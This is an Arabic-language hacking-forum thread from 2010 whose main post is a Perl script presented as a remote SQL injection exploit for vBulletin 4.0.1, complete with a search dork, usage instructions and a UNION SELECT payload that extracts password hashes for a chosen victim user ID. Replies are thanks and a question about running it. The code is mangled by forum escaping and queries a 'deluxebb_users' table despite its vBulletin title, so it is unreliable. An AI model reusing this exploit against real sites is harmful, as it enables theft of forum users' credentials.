نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك ,

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 13/05/2010, 18:31   المشاركة رقم: 1
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:
الصورة الرمزية
 
الصورة الرمزية ViRuS_Ra3cH

البيانات
التسجيل : Mar 2010
العضوية : 2
الاهتمامات : DZ
الإقامة : DZ
المواضيع : 466
الردود : 629
المجموع : 1,095
بمعدل : 0.19 يوميا
الاختراقات : [ra3ch]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 02/01/2018/12:49
سبب الغياب : معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم: 10
نقاط التقييم: 18
ViRuS_Ra3cH is on a distinguished road
شكراً: 493
تم شكره 194 مرة في 101 مشاركة

 Algeria


الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

افتراضي vBulletin™ Version 4.0.1 Remote SQL Injection Exploit

كود PHP:
#!/usr/bin/perl 
 
use io::socket
 
 
print 
q
#######################################################################
#    vbulletin™ version 4.0.1 remote sql injection exploit            #
#                      by indoushka                                   #
#                     ***91;url***93;www.iq-ty.com/vb***91;/url***93;                                #
#               souk naamane  (00213771818860)                        #
#           algeria hackerz ([])                   # 
#          dork: Powered by vbulletin™ version 4.0.1                  #            
####################################################################### 
}; 
 
if (!
$argv***91;2***93;) { 
 
print 
q
    
usagePerl  vb4.0.1.pl host /directoryvictim_userid 
 
       perl  vb4.0.1
.pl ***91;url***93;www.vb.com***91;/url***93; /forum
 
 
}; 
 

 
 
$server $argv***91;0***93;; 
$dir    $argv***91;1***93;; 
$user   $argv***91;2***93;; 
$myuser $argv***91;3***93;; 
$mypass $argv***91;4***93;; 
$myid   $argv***91;5***93;; 
 
print 
"------------------------------------------------------------------------------------------------\r\n"
print 
"***91;>***93; server: $server\r\n"
print 
"***91;>***93;    dir: $dir\r\n"
print 
"***91;>***93; userid: $user\r\n"
print 
"------------------------------------------------------------------------------------------------\r\n\r\n"
 
$server =~ s/(***91;url***93;http://)//eg;***91;/url***93; 
 
$path  $dir
$path .= "misc.php?sub=profile&name=0')+union+select+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from%20deluxebb_users%20where%20(uid= '".$user 
 
 
print 
"***91;~***93; prepare to connect...\r\n"
 
$socket io::socket::inet->newproto => "tcp"peeraddr => "$server"peerport => "80") || die "***91;-***93; connection failed"
 
print 
"***91;+***93; connected\r\n"
print 
"***91;~***93; sending query...\r\n"
print 
$socket "get $path http/1.1\r\n"
print 
$socket "host: $server\r\n"
print 
$socket "accept: */*\r\n"
print 
$socket "connection: Close\r\n\r\n"
print 
"***91;+***93; done!\r\n\r\n"
 
 
 
print 
"--***91; report ***93;------------------------------------------------------------------------------------\r\n"
while (
$answer = <$socket>) 

 
 if (
$answer =~/(w{32})/) 

 
  if ($
1 ne 0) { 
   print 
"password is: ".$1."\r\n"
print 
"--------------------------------------------------------------------------------------\r\n"
 
      } 
exit(); 

 

print 
"------------------------------------------------------------------------------------------------\r\n"



آخر مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===


التعديل الأخير تم بواسطة ViRuS_Ra3cH ; 13/05/2010 الساعة 20:21
عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
قديم 13/05/2010, 19:22   المشاركة رقم: 2
المعلومات
الكاتب:
 yasMouh  
اللقب:

الإتصالات
الحالة:
yasMouh غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك اخي رعش

عرض البوم صور yasMouh   رد مع اقتباس
قديم 13/05/2010, 21:02   المشاركة رقم: 3
المعلومات
الكاتب:
  eXc3lLenCe  
اللقب:
سردينة
حبيب الملايين

الإتصالات
الحالة:
eXc3lLenCe غير متواجد حالياً
وسائل الإتصال:

عندي سؤال أخي
هل يلزم برنامج معين للتعامل مع مثل هذه الثغرات أم لا

لأني لما اطبق الامر perl exploit.pl من الدوس يخرج لي خطأ

بارك الله فيك على الموضوع

عرض البوم صور eXc3lLenCe   رد مع اقتباس
قديم 14/05/2010, 07:50   المشاركة رقم: 4
المعلومات
الكاتب:
 00X  
اللقب:
Devil is back

الإتصالات
الحالة:
00X غير متواجد حالياً
وسائل الإتصال:

ثغرة رائعة بس ياريت تشرحها بالفديو احسن

عرض البوم صور 00X   رد مع اقتباس
قديم 29/07/2010, 17:39   المشاركة رقم: 5
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

لاهنت اخي الغالي
تحيتي لك
واصل

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 07/09/2010, 00:57   المشاركة رقم: 6
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

بوركت اخي رعش
بارك الله فيك

عرض البوم صور WOLF_DZ   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 44
00X , Abd Er Raouf , acer-dz , Admin , AnGeL25dZ , ApOcalYpse , attacker , Black-ID , c41virus , البرنس هاشم , الكاسر أسامة , dabelzero , Dr_HamZa-T , Ev!LScR!pT_Dz , eXc3lLenCe , fire-dz , Gulussa , h3tm@n , HACKER==MAN , hhhack , Hidden Pain , imad.dz27 , indoushka , Kaizoku , lasbat-dz , loGin.Dz , marwane , mbsoft , Mc.Hacker , MdMn HaCk3r , MR.KaDeRoU , n2nhacker , No MercY , o0o , RaYm0n , S1LV3rS3rf3r , singularly00 , SoLiTair4Ever , Th3_JoCkEr , ThE JoCkEy , The UnKn0wN , ViRuS_Ra3cH , WOLF_DZ , yasMouh

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[remote exploits] - WMITools ActiveX Remote Command Execution Exploit 0day ADMINISTRATOR قسم الثغرات 0 22/12/2010 15:57
[webapps / 0day] - Servia Kotisivut CMS - Remote Based SQL Injection Exploit ADMINISTRATOR قسم الثغرات 0 19/12/2010 19:45
[remote exploits] - ImageShack Toolbar 4.8.3.75 Remote Code Execution Exploit ADMINISTRATOR قسم الثغرات 0 30/11/2010 16:41
[remote exploits] - Netcraft Toolbar 1.8.1 Remote Code Execution Exploit ADMINISTRATOR قسم الثغرات 0 30/11/2010 16:41
[local exploits] - RarmaRadio Version 2.53.1 Bass 2.4 DLL Hijacking Exploit ADMINISTRATOR قسم الثغرات 0 30/11/2010 16:41

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 14:52.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115